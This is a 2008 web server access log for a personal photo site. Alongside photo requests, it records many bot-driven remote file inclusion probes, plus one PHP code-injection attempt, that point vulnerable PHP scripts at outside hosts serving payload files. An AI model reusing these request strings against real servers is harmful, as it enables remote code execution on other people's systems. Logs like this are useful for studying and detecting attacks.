134.253.26.4 - - [23/Jul/2008:09:27:08 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_392M.JPG HTTP/1.0" 200 267928 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:08 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_412M.JPG HTTP/1.0" 200 258645 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:09 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_63M.JPG HTTP/1.0" 200 187016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:09 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_389M.JPG HTTP/1.0" 200 254615 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:09 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4758M.JPG HTTP/1.0" 200 92314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:10 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4759M.JPG HTTP/1.0" 200 115668 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:10 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4756M.JPG HTTP/1.0" 200 83250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:10 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4761M.JPG HTTP/1.0" 200 100971 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:11 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4763M.JPG HTTP/1.0" 200 115854 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:11 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4764M.JPG HTTP/1.0" 200 139845 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:11 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4765M.JPG HTTP/1.0" 200 122648 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:11 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4767M.JPG HTTP/1.0" 200 106068 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:12 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4770M.JPG HTTP/1.0" 200 132223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:12 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4772M.JPG HTTP/1.0" 200 124499 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:12 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4774M.JPG HTTP/1.0" 200 120197 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:13 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4776M.JPG HTTP/1.0" 200 77797 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:13 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4777M.JPG HTTP/1.0" 200 55402 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:13 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4781M.JPG HTTP/1.0" 200 77290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:13 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4782M.JPG HTTP/1.0" 200 46674 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:13 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4787M.JPG HTTP/1.0" 200 97170 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
65.55.109.18 - - [23/Jul/2008:09:27:13 -0700] "GET /?N=A&show=gallery&pageid=159&nggpage=2 HTTP/1.0" 200 36723 "http://search.live.com/results.aspx?q=byron&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:14 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4786M.JPG HTTP/1.0" 200 55154 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
65.55.109.18 - - [23/Jul/2008:09:27:14 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/?N=A&show=gallery&pageid=159&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:27:14 -0700] "GET /logs/access_080225.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:27:14 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:14 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4796M.JPG HTTP/1.0" 200 61992 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:14 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4805M.JPG HTTP/1.0" 200 107286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:27:14 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.109.18 - - [23/Jul/2008:09:27:14 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/?N=A&show=gallery&pageid=159&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:14 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4803M.JPG HTTP/1.0" 200 57761 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
65.55.109.18 - - [23/Jul/2008:09:27:15 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/?N=A&show=gallery&pageid=159&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.18 - - [23/Jul/2008:09:27:15 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://www.dmulk.com/?N=A&show=gallery&pageid=159&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:15 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4809M.JPG HTTP/1.0" 200 105478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
65.55.109.18 - - [23/Jul/2008:09:27:15 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://www.dmulk.com/?N=A&show=gallery&pageid=159&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:15 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4807M.JPG HTTP/1.0" 200 120070 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:15 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4816M.JPG HTTP/1.0" 200 75622 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
65.55.109.18 - - [23/Jul/2008:09:27:15 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://www.dmulk.com/?N=A&show=gallery&pageid=159&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:16 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4834M.JPG HTTP/1.0" 200 102463 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:16 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/IMG_4838M.JPG HTTP/1.0" 200 92178 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:16 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/Rio_Grande_North_view_M.jpg HTTP/1.0" 200 46561 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:16 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/WeSTOC-2008_324M.JPG HTTP/1.0" 200 206622 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:17 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/WeSTOC_2008_325M.JPG HTTP/1.0" 200 245291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
222.73.48.200 - - [23/Jul/2008:09:27:18 -0700] "GET /logs/senetman/html/index.php?page=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [23/Jul/2008:09:27:18 -0700] "GET /senetman/html/index.php?page=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.199.180.165 - - [23/Jul/2008:09:27:26 -0700] "GET /logs/access_080329.log HTTP/1.1" 200 1230336 "http://search.yahoo.com/search;_ylt=A0geu5M0WYdIOIABw8lXNyoA?p=@free.fr+++++++++++++++2008++++++txt&y=Search&fr=sfp&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.1)" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:27:29 -0700] "GET /logs/access_080329.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:27:29 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:27:30 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:27:32 -0700] "GET /logs/access_080303.log/myPHPCalendar/admin.php?cal_dir=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:27:32 -0700] "GET /logs/access_080225.log/modules/agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:27:33 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:27:33 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:27:41 -0700] "GET /logs/access_080205.log/yabbse/Sources/Packages.php?sourcedir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:27:41 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:27:42 -0700] "GET /logs/yabbse/Sources/Packages.php?sourcedir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:27:50 -0700] "GET /logs/access.log/errors.php?error=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:27:51 -0700] "GET /errors.php?error=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:27:51 -0700] "GET /logs/errors.php?error=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.73.48.200 - - [23/Jul/2008:09:27:57 -0700] "GET /logs/senetman/html/index.php?page=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [23/Jul/2008:09:27:57 -0700] "GET /senetman/html/index.php?page=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:28:00 -0700] "GET /logs/access_080329.log/modules/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:28:04 -0700] "GET /logs/access_080225.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:28:04 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:28:04 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.116.50.181 - - [23/Jul/2008:09:28:08 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
201.116.50.181 - - [23/Jul/2008:09:28:08 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
201.116.50.181 - - [23/Jul/2008:09:28:11 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:28:20 -0700] "GET /logs/access_080303.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:28:23 -0700] "GET /logs/access.log//playing.php/common/db.php?commonpath=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:28:25 -0700] "GET //playing.php/common/db.php?commonpath=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:28:28 -0700] "GET /logs//playing.php/common/db.php?commonpath=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.115.34.17 - - [23/Jul/2008:09:28:31 -0700] "GET /logs/access.log/errors.php?error=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [23/Jul/2008:09:28:32 -0700] "GET /errors.php?error=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [23/Jul/2008:09:28:32 -0700] "GET /logs/errors.php?error=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
222.73.48.200 - - [23/Jul/2008:09:28:33 -0700] "GET /logs/senetman/html/index.php?page=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.74.194 - - [23/Jul/2008:09:28:33 -0700] "GET /logs/access_080118.log/errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.74.194 - - [23/Jul/2008:09:28:34 -0700] "GET /errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.74.194 - - [23/Jul/2008:09:28:34 -0700] "GET /logs/errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.73.48.200 - - [23/Jul/2008:09:28:34 -0700] "GET /senetman/html/index.php?page=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.134.195 - - [23/Jul/2008:09:28:35 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.195 - - [23/Jul/2008:09:28:35 -0700] "GET //include/admin.lib.inc.php?site_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.195 - - [23/Jul/2008:09:28:36 -0700] "GET /logs//include/admin.lib.inc.php?site_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:28:38 -0700] "GET /logs/access_080309.log/yabbse/Sources/Packages.php?sourcedir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:29:28 -0700] "GET /logs/access_080105.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:29:38 -0700] "GET /logs/access_080329.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:29:38 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:29:39 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.203.110 - - [23/Jul/2008:09:29:40 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.toxiii.com/includes/includes/m???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
87.118.98.3 - - [23/Jul/2008:09:29:41 -0700] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=http://utenti.lycos.it/kaizoku384/HRtest/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.203.110 - - [23/Jul/2008:09:29:41 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.toxiii.com/includes/includes/m???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
209.163.169.99 - - [23/Jul/2008:09:29:41 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.proxi-com.ru/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.118.98.3 - - [23/Jul/2008:09:29:41 -0700] "GET //includes/orderSuccess.inc.php?&glob=1&cart_order_id=http://utenti.lycos.it/kaizoku384/HRtest/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [23/Jul/2008:09:29:43 -0700] "GET /logs/access_071230.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [23/Jul/2008:09:29:43 -0700] "GET /logs/access_071230.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.151.242 - - [23/Jul/2008:09:29:47 -0700] "GET /logs/access.log/errors.php?error=http://www.bvikrasnodar.ru/netcat_files/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [23/Jul/2008:09:29:47 -0700] "GET /errors.php?error=http://www.bvikrasnodar.ru/netcat_files/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [23/Jul/2008:09:29:47 -0700] "GET /logs/errors.php?error=http://www.bvikrasnodar.ru/netcat_files/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:29:55 -0700] "GET /logs/access_080329.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:29:55 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:29:55 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:30:02 -0700] "GET /logs/access_080311.log%20/modules/coppermine/themes/default/theme.php?THEME_DIR=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
